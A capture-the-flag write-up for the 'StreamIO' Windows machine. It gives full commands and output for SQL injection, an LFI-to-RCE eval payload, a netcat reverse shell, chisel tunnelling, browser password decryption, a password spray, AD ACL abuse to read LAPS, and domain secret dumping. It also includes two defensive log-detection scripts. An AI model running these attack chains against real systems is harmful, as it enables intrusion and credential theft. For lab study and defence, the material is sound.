# StreamIO

# Enumeration

# Nmap

Nmap all ports:

$ sudo nmap -p- --min-rate=1000 -T4 

Nmap scan report for
Host is up (0.27s latency).
Not shown: 65515 filtered tcp ports (no-response)
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
443/tcp   open  https
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown
49697/tcp open  unknown
52483/tcp open  unknown

Nmap safe scripts on open ports:

$ sudo nmap -sC -sV -p 53,80,88,135,443,445,464,593,636,3268,3269,5985,9389,49667,49669,49670,49697,52483 -oN nmap.txt

Nmap scan report for
Host is up (0.33s latency).

53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods: 
|_  Potentially risky methods: TRACE
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-06-05 08:14:15Z)
135/tcp   open  msrpc         Microsoft Windows RPC
443/tcp   open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
| ssl-cert: Subject: commonName=streamIO/countryName=EU
| Subject Alternative Name: DNS:streamIO.htb, DNS:watch.streamIO.htb
| Not valid before: 2022-02-22T07:03:28
|_Not valid after:  2022-03-24T07:03:28
| tls-alpn: 
|_  http/1.1
|_ssl-date: 2022-06-05T08:15:52+00:00; +6h59m35s from scanner time.
|_http-title: Not Found
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: streamIO.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49670/tcp open  msrpc         Microsoft Windows RPC
49697/tcp open  msrpc         Microsoft Windows RPC
52483/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2022-06-05T08:15:10
|_  start_date: N/A
|_clock-skew: mean: 6h59m35s, deviation: 0s, median: 6h59m34s

I see a couple of DNS names in the certificate returned on port 443:

  • DNS:streamIO.htb
  • DNS:watch.streamIO.htb

We can add those to our /etc/hosts file:

...[SNIP]...   streamIO.htb watch.streamIO.htb


# StreamIO - Port 443

Browsing to https://streamio.htb loads an online movie streaming site. There is a login form asking for a username and password at https://streamio.htb/login.php.

We can use Burp to intercept a login attempt, save the request to a file and feed it to sqlmap to check for SQL injection:

SQL injection found in the username parameter:

$ sqlmap -r login.req --batch --force-ssl

POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N                                                        
sqlmap identified the following injection point(s) with a total of 64 HTTP(s) requests:                                                                  
Parameter: username (POST)                                                                                                                               
    Type: stacked queries                                                                                                                                
    Title: Microsoft SQL Server/Sybase stacked queries (comment)                                                                                         
    Payload: username=caue';WAITFOR DELAY '0:0:5'--&password=test                                                                                        

Since the injection is only detectable through time delays, retrieving data takes a very long time.

Dumping the databases:

$ sqlmap -r login.req --batch --force-ssl --dbs

available databases [5]:
[*] model
[*] msdb
[*] streamio_backup
[*] tempdb

At this point we can guess some table names to speed things up. For example, we can guess that there is a table called "users" in the STREAMIO database, which, as the name suggests, belongs to the web app with the login page.

Dumping the users table from the STREAMIO database shows 33 users, which would take forever to finish this way. Anyway, here is the syntax:

$ sqlmap -r login.req --batch --force-ssl -D STREAMIO -T users --dump


| id | is_staff | password                         | username  |
|----|----------|----------------------------------|-----------|
| 31 | 1        | b779ba15cedfd22a023c4d8bcf5f2332 | yoshihide |


We get a lot of users and password hashes. Cracking them with CrackStation gives us:

username = yoshihide
password = '66boysandgirls..'

We can use these credentials to log in at https://streamio.htb/login.php. Logged in as yoshihide not much changes on the website, but running gobuster we find the /admin endpoint.

$ gobuster dir -u https://streamio.htb/ -w /usr/share/seclists/Discovery/Web-Content/raft-small-words-lowercase.txt -x php -k


/admin                (Status: 301) [Size: 150] [--> https://streamio.htb/admin/]


# LFI to RCE

Browsing around https://streamio.htb/admin/ we see that all the pages end with a parameter:

We can fuzz it to see if there are more. Using wfuzz, --hw 131 hides all responses with 131 words, -b PHPSESSID passes the admin session cookie and -w sets the wordlist.

$ wfuzz --hw 131 -b PHPSESSID=luoqop4jub9vubjbl5ngnblrb1 -w /usr/share/seclists/Discovery/Web-Content/api/objects.txt 'https://streamio.htb/admin/?FUZZ='

* Wfuzz 3.1.0 - The Web Fuzzer                         *

Target: https://streamio.htb/admin/?FUZZ=
Total requests: 3132

ID           Response   Lines    Word       Chars       Payload                                                                                 

000000514:   200        49 L     137 W      1712 Ch     "debug"


After some testing, we find that the debug parameter is vulnerable to LFI:

Using the PHP filter trick we can extract the source code of some of the web pages. The important part is in the source of index.php, read via https://streamio.htb/admin/?debug=php://filter/convert.base64-encode/resource=index.php:


$connection = array("Database"=>"STREAMIO", "UID" => "db_admin", "PWD" => 'B1@hx31234567890');
$handle = sqlsrv_connect('(local)',$connection);


So we have the database username and password, but how do we use them? After getting stuck here for a while I decided to fuzz the file name in the LFI to see if I could get more source code:

$ wfuzz --hh 1712 -b PHPSESSID=luoqop4jub9vubjbl5ngnblrb1 -w /usr/share/seclists/Discovery/Web-Content/api/objects.txt 'https://streamio.htb/admin/?debug=php://filter/convert.base64-encode/resource=FUZZ.php'

* Wfuzz 3.1.0 - The Web Fuzzer                         *

Target: https://streamio.htb/admin/?debug=php://filter/convert.base64-encode/resource=FUZZ.php
Total requests: 3132

ID           Response   Lines    Word       Chars       Payload                                                                                 

000000908:   200        49 L     137 W      4916 Ch     "Index"                                                                                 
000000909:   200        49 L     137 W      4916 Ch     "index"                                                                                 
000001118:   200        49 L     137 W      5788 Ch     "master"

Cool, there is a master.php file as well! Doing a bit of code analysis on this file we finally see the path to a shell. master.php uses the function eval like this:


if($_POST['include'] !== "index.php" )
    // eval line as described below: the include value is fetched and executed
    eval(file_get_contents($_POST['include']));
else
    echo(" ---- ERROR ---- ");

The logic above says that if a POST request to master.php carries an include parameter whose value is anything other than index.php, that value is fetched and passed to eval. Since PHP stream wrappers such as data:// are accepted, this is a remote code execution vulnerability.
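From the defender's side, both the time-based injection on login.php and the php://filter and data:// tricks on the debug parameter leave a clear trace in the IIS logs. The following is an added example (not part of the original write-up) that runs those checks over a few constructed W3C log lines; the field order, the 4500 ms threshold and the sample entries are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote_plus

# Constructed IIS W3C log lines (not from the original write-up). The field
# order is the default IIS set: date time s-ip cs-method cs-uri-stem
# cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status
# sc-substatus sc-win32-status time-taken
SAMPLE_LOG = """\
2022-06-05 08:14:10 10.0.0.5 GET /index.php - 443 - 10.0.0.77 Mozilla/5.0 - 200 0 0 41
2022-06-05 08:14:15 10.0.0.5 POST /login.php - 443 - 10.0.0.77 curl/7.81 - 200 0 0 5093
2022-06-05 08:14:21 10.0.0.5 POST /login.php - 443 - 10.0.0.77 curl/7.81 - 200 0 0 5088
2022-06-05 08:20:02 10.0.0.5 GET /admin/ debug=php%3A%2F%2Ffilter%2Fconvert.base64-encode%2Fresource%3Dindex.php 443 - 10.0.0.77 Mozilla/5.0 - 200 0 0 12
2022-06-05 08:25:40 10.0.0.5 POST /admin/ debug=master.php&cmd=dir 443 - 10.0.0.77 curl/7.81 - 200 0 0 30
2022-06-05 08:26:00 10.0.0.5 GET /admin/ - 443 - 10.0.0.77 Mozilla/5.0 - 200 0 0 9
"""

IIS_FIELDS = ("date", "time", "s_ip", "method", "uri_stem", "uri_query", "port",
              "username", "c_ip", "user_agent", "referer", "status",
              "substatus", "win32_status", "time_taken")

# PHP stream wrappers (php://filter, data://) and the base64 filter used to
# read source instead of executing it.
WRAPPER_RE = re.compile(r"(?i)\b(?:php|data|expect|phar|file)://|convert\.base64-(?:en|de)code")
# WAITFOR DELAY '0:0:5' adds ~5 s to every probe; normal logins take milliseconds.
SLOW_LOGIN_MS = 4500


def parse_iis_line(line):
    """Split one W3C log line into a dict; returns None for malformed lines."""
    parts = line.split(" ")
    if len(parts) != len(IIS_FIELDS):
        return None
    rec = dict(zip(IIS_FIELDS, parts))
    rec["time_taken"] = int(rec["time_taken"])
    rec["uri_query"] = "" if rec["uri_query"] == "-" else unquote_plus(rec["uri_query"])
    return rec


def classify(rec):
    """Return the finding labels that apply to one parsed request."""
    findings = []
    query = rec["uri_query"]
    if WRAPPER_RE.search(query):
        findings.append("php-wrapper-in-query")
    # A debug= value naming a .php file is the LFI; debug=master.php with
    # extra parameters is the RCE path.
    for value in parse_qs(query, keep_blank_values=True).get("debug", []):
        if value.lower().endswith(".php"):
            findings.append("debug-includes-php-source")
    if (rec["method"] == "POST" and rec["uri_stem"].lower().endswith("/login.php")
            and rec["time_taken"] >= SLOW_LOGIN_MS):
        findings.append("slow-login-post")
    return findings


def scan_log(text):
    """Return (time, client_ip, label, stem, query) for every suspicious request."""
    alerts = []
    for line in text.splitlines():
        if not line or line.startswith("#"):   # W3C header lines start with '#'
            continue
        rec = parse_iis_line(line)
        if rec is None:
            continue
        for label in classify(rec):
            alerts.append((rec["time"], rec["c_ip"], label, rec["uri_stem"], rec["uri_query"]))
    return alerts


def suspected_time_based_sqli(alerts, min_hits=2):
    """Client IPs with repeated slow login POSTs: one slow login is noise, a run
    of them at the same ~5 s delay is the WAITFOR DELAY probe pattern."""
    counts = {}
    for _, ip, label, _, _ in alerts:
        if label == "slow-login-post":
            counts[ip] = counts.get(ip, 0) + 1
    return sorted(ip for ip, n in counts.items() if n >= min_hits)


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
    print("time-based SQLi suspects:", suspected_time_based_sqli(scan_log(SAMPLE_LOG)))
```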

# RCE - Foothold

We can base64 encode our code to be passed to eval like this:

$ echo 'system($_REQUEST["cmd"]);' | base64

Once evaluated, the encoded snippet adds a cmd parameter that runs system commands from within master.php.

And then we can send system commands like this:

$ curl -s -k -X 'POST' -H 'Content-Type: application/x-www-form-urlencoded' -b 'PHPSESSID=luoqop4jub9vubjbl5ngnblrb1' --data-binary "include=data://text/plain;base64,c3lzdGVtKCRfUkVRVUVTVFsiY21kIl0pOwo=" 'https://streamio.htb/admin/?debug=master.php&cmd=dir' | grep '<input name="include" hidden>' -A 9999 |grep '</div>' -B 9999 | tail -n +3 | head -n -1

Volume in drive C has no label.
 Volume Serial Number is A381-2B63

 Directory of C:\inetpub\streamio.htb\admin

02/22/2022  03:49 AM    <DIR>          .
02/22/2022  03:49 AM    <DIR>          ..
02/22/2022  03:49 AM    <DIR>          css
02/22/2022  03:49 AM    <DIR>          fonts
02/22/2022  03:49 AM    <DIR>          images
06/03/2022  01:51 AM             2,401 index.php
02/22/2022  04:19 AM    <DIR>          js
06/03/2022  01:53 AM             3,055 master.php
02/23/2022  03:16 AM               878 movie_inc.php
02/23/2022  03:16 AM               936 staff_inc.php
02/23/2022  03:16 AM               879 user_inc.php
               5 File(s)          8,149 bytes
               6 Dir(s)   5,373,267,968 bytes free

We learn that we are in the directory C:\inetpub\streamio.htb\admin. To get a reverse shell we can upload netcat and then run it remotely to send us a reverse shell.

If the upload fails, C:\Windows\System32\spool\drivers\color\ is always a good directory to upload files to (e.g. ...\color\nc.exe), as it is often whitelisted by the AV.

Using the same curl command as above we can change the cmd= value to:

# Upload netcat

# Get a reverse shell

Receiving the reverse shell:

$ rlwrap nc -lnvp 9001
listening on [any] 9001 ...
connect to [] from (UNKNOWN) [] 49935
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\inetpub\streamio.htb\admin> whoami

# Shell as yoshihide

# Enumerating the machine

Enumerating users:

PS C:\inetpub\streamio.htb\admin> net user
net user

User accounts for \\DC

Administrator            Guest                    JDgodd                   
krbtgt                   Martin                   nikk37                   
The command completed successfully.

We can see that Martin is a member of the Administrators group:

PS C:\inetpub\streamio.htb\admin> net user Martin /domain
net user Martin /domain
User name                    Martin
Full Name                    
Users comment               
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            5/26/2022 4:16:42 PM
Password expires             Never
Password changeable          5/27/2022 4:16:42 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script                 
User profile                 
Home directory               
Last logon                   6/5/2022 12:35:13 AM

Logon hours allowed          All

Local Group Memberships      *Administrators       *Remote Management Use
Global Group memberships     *Domain Users

We might need to find a way to escalate from yoshihide to Martin or Administrator.

Enumerating the network - Ports listening:

PS C:\inetpub\streamio.htb\admin> netstat -ano | findstr LISTENING                                                                                                                         

  TCP                 LISTENING       4                                                                                 
  TCP                 LISTENING       616
  TCP                LISTENING       884
  TCP                LISTENING       616
  TCP                LISTENING       4
  TCP                LISTENING       4
  TCP                LISTENING       616
  TCP                LISTENING       884
  TCP                LISTENING       616
  TCP               LISTENING       3584
  TCP               LISTENING       4
  TCP               LISTENING       2592
  TCP              LISTENING       4
  TCP              LISTENING       472
  TCP              LISTENING       1076
  TCP              LISTENING       1456
  TCP              LISTENING       616
  TCP              LISTENING       616
  TCP              LISTENING       616
  TCP              LISTENING       608
  TCP              LISTENING       2776
  TCP              LISTENING       2748
  TCP              LISTENING       2776
  TCP              LISTENING       4

Comparing these ports with the nmap scan reveals some differences. One of them is that port 1433 (MSSQL) is listening internally only, and we have credentials for the database. We can use chisel to forward this port to our machine so we can use our usual tools against it.

# Forward MSSQL port to our local machine

Download chisel for linux and windows:

# Chisel for linux
$ wget https://github.com/jpillora/chisel/releases/download/v1.7.7/chisel_1.7.7_linux_amd64.gz

# Chisel for windows
$ wget https://github.com/jpillora/chisel/releases/download/v1.7.7/chisel_1.7.7_windows_amd64.gz

Start the chisel server on our machine:

$ ./chisel server -p 8000 --reverse

Upload chisel for windows to the target and forward port 1433:

PS C:\inetpub\streamio.htb\admin> wget -o chisel.exe

PS C:\inetpub\streamio.htb\admin> .\chisel.exe client R:1433:

Now we can connect to MSSQL using the credentials we found earlier:

$ sqsh -S -U db_admin -P 'B1@hx31234567890'

Enumerating the databases:

1> SELECT name, database_id, create_date                                                                                                                 
FROM sys.databases
2> go


Let's dump the users table of the streamio_backup database:

1> use streamio_backup                                                                                                                                   
2> go                                                                                                                                                    
1> select * from users                                                                                                                                   
2> go

1 nikk37        389d14cb8e4e9b94b137deb1caf0612a                                                                                                                 
2 yoshihide     b779ba15cedfd22a023c4d8bcf5f2332                                                                                                                 
3 James         c660060492d9edcaa8332d89c99c9239                                                                                                                 
4 Theodore      925e5408ecb67aea449373d668b7359e                                                                                                                 
5 Samantha      083ffae904143c4796e464dac33c1f7d                                                                                                                 
6 Lauren        08344b85b329d7efd611b7a7743e8a09                                                                                                                 
7 William       d62be0dc82071bccc1322d64ec5b6c51                                                                                                                 
8 Sabrina       f87d3c0d6c8fd686aacc6627f1f493a5

The important credentials here are those of nikk37, as that is also a user on the machine. Using CrackStation we can crack the password:

Username: nikk37
Password: get_dem_girls2@yahoo.com

# Shell as Nikk37

Using nikk37 credentials we can connect to the target via WinRM:

$ evil-winrm -u nikk37 -p 'get_dem_girls2@yahoo.com' -i

PS C:\Users\nikk37\Documents> whoami

Get the user flag:

PS C:\Users\nikk37\desktop> type user.txt

Enumerating nikk37's files we find a Firefox database file key4.db and 2 interesting JSON files, logins.json and logins-backup.json:

PS C:\Users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release> dir

Directory: C:\Users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        2/22/2022   2:40 AM                bookmarkbackups
d-----        2/22/2022   2:40 AM                browser-extension-data
d-----        2/22/2022   2:41 AM                crashes
d-----        2/22/2022   2:42 AM                datareporting
d-----        2/22/2022   2:40 AM                minidumps
d-----        2/22/2022   2:42 AM                saved-telemetry-pings
d-----        2/22/2022   2:40 AM                security_state
d-----        2/22/2022   2:42 AM                sessionstore-backups
d-----        2/22/2022   2:40 AM                storage
-a----        2/22/2022   2:40 AM             24 addons.json
-a----        2/22/2022   2:42 AM           5189 addonStartup.json.lz4
-a----        2/22/2022   2:42 AM            310 AlternateServices.txt
-a----        2/22/2022   2:41 AM         229376 cert9.db
-a----        2/22/2022   2:40 AM            208 compatibility.ini
-a----        2/22/2022   2:40 AM            939 containers.json
-a----        2/22/2022   2:40 AM         229376 content-prefs.sqlite
-a----        2/22/2022   2:40 AM          98304 cookies.sqlite
-a----        2/22/2022   2:40 AM           1081 extension-preferences.json
-a----        2/22/2022   2:40 AM          43726 extensions.json
-a----        2/22/2022   2:42 AM        5242880 favicons.sqlite
-a----        2/22/2022   2:41 AM         262144 formhistory.sqlite
-a----        2/22/2022   2:40 AM            778 handlers.json
-a----        2/22/2022   2:40 AM         294912 key4.db
-a----        2/22/2022   2:41 AM           1593 logins-backup.json
-a----        2/22/2022   2:41 AM           2081 logins.json
-a----        2/22/2022   2:42 AM              0 parent.lock
-a----        2/22/2022   2:42 AM          98304 permissions.sqlite
-a----        2/22/2022   2:40 AM            506 pkcs11.txt
-a----        2/22/2022   2:42 AM        5242880 places.sqlite
-a----        2/22/2022   2:42 AM           8040 prefs.js
-a----        2/22/2022   2:42 AM            180 search.json.mozlz4
-a----        2/22/2022   2:42 AM            288 sessionCheckpoints.json
-a----        2/22/2022   2:42 AM           1853 sessionstore.jsonlz4
-a----        2/22/2022   2:40 AM             18 shield-preference-experiments.json
-a----        2/22/2022   2:42 AM            611 SiteSecurityServiceState.txt
-a----        2/22/2022   2:42 AM           4096 storage.sqlite
-a----        2/22/2022   2:40 AM             50 times.json
-a----        2/22/2022   2:40 AM          98304 webappsstore.sqlite
-a----        2/22/2022   2:42 AM            141 xulstore.json

We use Evil-WinRM to download key4.db to our machine:

# We need to use the full path!
PS C:\Users\nikk37> download C:\Users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release\key4.db key4.db

Download logins.json:

# We need to use the full path!
PS C:\Users\nikk37> download C:\Users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release\logins.json logins.json

We can use the Firepwd tool to decrypt the logins stored in the DB:

# We use -d to specify the directory where key4.db and logins.json are saved
$ python firepwd.py -d ../www/
decrypting login/password pairs

# SMB password spray

Now that we have many users and passwords we can use crackmapexec to do a password spray. I put all the users found so far in a file called users.txt and all the passwords in passwords.txt:

$ cme smb streamio.htb -u users.txt -p passwords.txt --continue-on-success
SMB streamIO.htb 445 DC [+] streamIO.htb\nikk37:get_dem_girls2@yahoo.com 
SMB streamIO.htb 445 DC [+] streamIO.htb\jdgodd:JDg0dd1s@d0p3cr3@t0r

It is very important to use the --continue-on-success flag, otherwise crackmapexec stops at the first valid login.

Cool! We got one more set of credentials, for the jdgodd user:

Username: jdgodd
Password: JDg0dd1s@d0p3cr3@t0r
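As a defender-side counterpart to this spray, here is an added example (not from the original write-up) that flags a source IP failing against many distinct accounts in a short window from Windows 4625/4624 events, and lists the accounts that nevertheless succeeded from the same source, which is exactly what a --continue-on-success spray leaves behind; the sample events, window and threshold are constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of Windows Security events (not from the original
# write-up): (timestamp, event_id, target_user, source_ip).
# 4625 = failed logon, 4624 = successful logon.
EVENTS = [
    ("2022-06-06 03:40:01", 4625, "Administrator", "10.0.0.77"),
    ("2022-06-06 03:40:01", 4625, "Guest", "10.0.0.77"),
    ("2022-06-06 03:40:02", 4625, "JDgodd", "10.0.0.77"),
    ("2022-06-06 03:40:02", 4625, "Martin", "10.0.0.77"),
    ("2022-06-06 03:40:02", 4624, "nikk37", "10.0.0.77"),
    ("2022-06-06 03:40:03", 4625, "yoshihide", "10.0.0.77"),
    ("2022-06-06 03:40:03", 4624, "JDgodd", "10.0.0.77"),
    ("2022-06-06 03:55:10", 4625, "Martin", "10.0.0.23"),  # a single typo, not a spray
]


def detect_spray(events, window=timedelta(minutes=5), min_users=4):
    """Map source IP -> {'failed_users': [...], 'succeeded_users': [...]} for
    every source that failed against at least `min_users` distinct accounts
    inside one `window`. Successful logons from the same source in that window
    are reported too: with --continue-on-success the spray keeps going after a
    hit, so a 4624 sandwiched between 4625s is an account that was found."""
    by_ip = defaultdict(list)
    for ts, event_id, user, ip in events:
        by_ip[ip].append((datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), event_id, user))

    findings = {}
    for ip, evs in by_ip.items():
        evs.sort()
        # Slide the window start over each event from this source.
        for i, (start, _, _) in enumerate(evs):
            failed, succeeded = set(), set()
            for t, event_id, user in evs[i:]:
                if t - start > window:
                    break
                (failed if event_id == 4625 else succeeded).add(user)
            if len(failed) >= min_users:
                findings[ip] = {"failed_users": sorted(failed),
                                "succeeded_users": sorted(succeeded)}
                break
    return findings


if __name__ == "__main__":
    for ip, info in detect_spray(EVENTS).items():
        print(f"{ip}: spray against {len(info['failed_users'])} accounts, "
              f"valid credentials found for {info['succeeded_users']}")
```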

# Bloodhound

We still don't know the path to martin or administrator. Let's run Bloodhound to map the AD and draw some graphs! Run SharpHound on the target to collect the data:

*Evil-WinRM* PS C:\Users\nikk37> .\SharpHound.exe -c all

2022-06-06T03:46:48.9960341-07:00|INFORMATION|Status: 97 objects finished (+97 2.204545)/s -- Using 40 MB RAM
2022-06-06T03:46:48.9960341-07:00|INFORMATION|Enumeration finished in 00:00:44.2927695
2022-06-06T03:46:49.1835426-07:00|INFORMATION|SharpHound Enumeration Completed at 3:46 AM on 6/6/2022! Happy Graphing!

Download the loot to our machine:

*Evil-WinRM* PS C:\Users\nikk37> download C:\Users\nikk37\20220606034648_BloodHound.zip bloodhound-loot.zip

Start neo4j server:

$ sudo neo4j console

Start Bloodhound, log in to neo4j and import the loot (simply drag-and-drop the .zip)!

$ ./BloodHound

Mark the user we owned:

I also marked martin as High Value. From the Bloodhound output there is no direct path from nikk37 to the admin accounts.

We have jdgodd's password, so let's mark him as owned too. Selecting "Shortest Path to Owned Principals" we finally see the path to Administrator:

The user jdgodd has WriteOwner privileges over the "CORE STAFF" group, and members of CORE STAFF can read the LAPS password! What is LAPS? The "Local Administrator Password Solution" (LAPS) manages the local administrator account passwords of domain-joined computers. The passwords are stored in Active Directory (AD) and protected by an ACL, so only eligible users can read them or request a reset.

# Privilege Escalation

First let's upload PowerView:

PS C:\Users\nikk37> upload PowerView.ps1
PS C:\Users\nikk37> Import-Module ./PowerView.ps1

Disclaimer: For some reason only the PowerView.ps1 script from the dev branch works.

Now we create the credential object and make jdgodd the owner of the CORE STAFF object:

PS C:\Users\nikk37> $SecPassword = ConvertTo-SecureString 'JDg0dd1s@d0p3cr3@t0r' -AsPlainText -Force

PS C:\Users\nikk37> $Cred = New-Object System.Management.Automation.PSCredential('streamio.htb\jdgodd', $SecPassword)

PS C:\Users\nikk37> Set-DomainObjectOwner -Credential $Cred -Identity "CORE STAFF" -OwnerIdentity jdgodd

Give jdgodd all rights on the group and add him as a member of CORE STAFF:

PS C:\Users\nikk37> Add-DomainObjectAcl -Credential $Cred -TargetIdentity "CORE STAFF" -PrincipalIdentity jdgodd -Rights All

PS C:\Users\nikk37> Add-DomainGroupMember -Identity "CORE STAFF" -Members "jdgodd" -Credential $Cred -Verbose

No errors so far, let's check if it worked:

PS C:\Users\nikk37> Get-DomainGroupMember -Identity 'CORE STAFF'

GroupDomain             : streamIO.htb
GroupName               : CORE STAFF
GroupDistinguishedName  : CN=CORE STAFF,CN=Users,DC=streamIO,DC=htb
MemberDomain            : streamIO.htb
MemberName              : JDgodd
MemberDistinguishedName : CN=JDgodd,CN=Users,DC=streamIO,DC=htb
MemberObjectClass       : user
MemberSID               : S-1-5-21-1470860369-1569627196-4264678630-1104

Great! Let's dump the LAPS password:

PS C:\Users\nikk37> Get-DomainObject dc.streamio.htb -Credential $Cred -Properties "ms-mcs-AdmPwd",name

name ms-mcs-admpwd
---- -------------
DC   !vG(xZ{)5b8!4G

Alternatively we can use crackmapexec to dump LAPS:

$ crackmapexec ldap -u jdgodd -p 'JDg0dd1s@d0p3cr3@t0r' -M laps

Now we can get a shell as Administrator using Evil-Winrm:

$ evil-winrm -u Administrator -p '!vG(xZ{)5b8!4G' -i

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami

We are Administrator!

# Post Exploitation

Dumping the secrets:

$ impacket-secretsdump streamio.htb/Administrator:'!vG(xZ{)5b8!4G'@

Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation                                                                                                 
[*] Service RemoteRegistry is in stopped state                                                                                                           
[*] Starting service RemoteRegistry                                                                                                                      
[*] Target system bootKey: 0x4dbf07084a530cfa7ab417236bd4a647                                                                                            
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)                                                                                                     
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesnt have hash information.                                                 
[*] Dumping cached domain logon information (domain/username:hash)                                                                                       
[*] Dumping LSA Secrets                                                                                                                                  
[*] $MACHINE.ACC                                                                                                                                         
[*] DPAPI_SYSTEM                                                                                                                                         
[*] NL$KM                                                                                                                                                
 0000   A5 68 6C 6F 0F D6 72 8F  9E DE A2 27 47 D1 73 3A   .hlo..r....G.s:                                                                              
 0010   EA FB 23 4A 58 C9 04 91  95 A2 E7 3C 63 1A E8 B1   ..#JX......<c...                                                                              
 0020   DA D8 C8 95 DD 09 23 97  A5 5A 21 74 17 17 CC C6   ......#..Z!t....                                                                              
 0030   5E 1B F7 BE 34 99 DC 39  D1 72 7B 3E 19 B6 B2 3C   ^...4..9.r{>...<
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)                                                                                            
[*] Using the DRSUAPI method to get NTDS.DIT secrets                                                                                                     
[*] Kerberos keys grabbed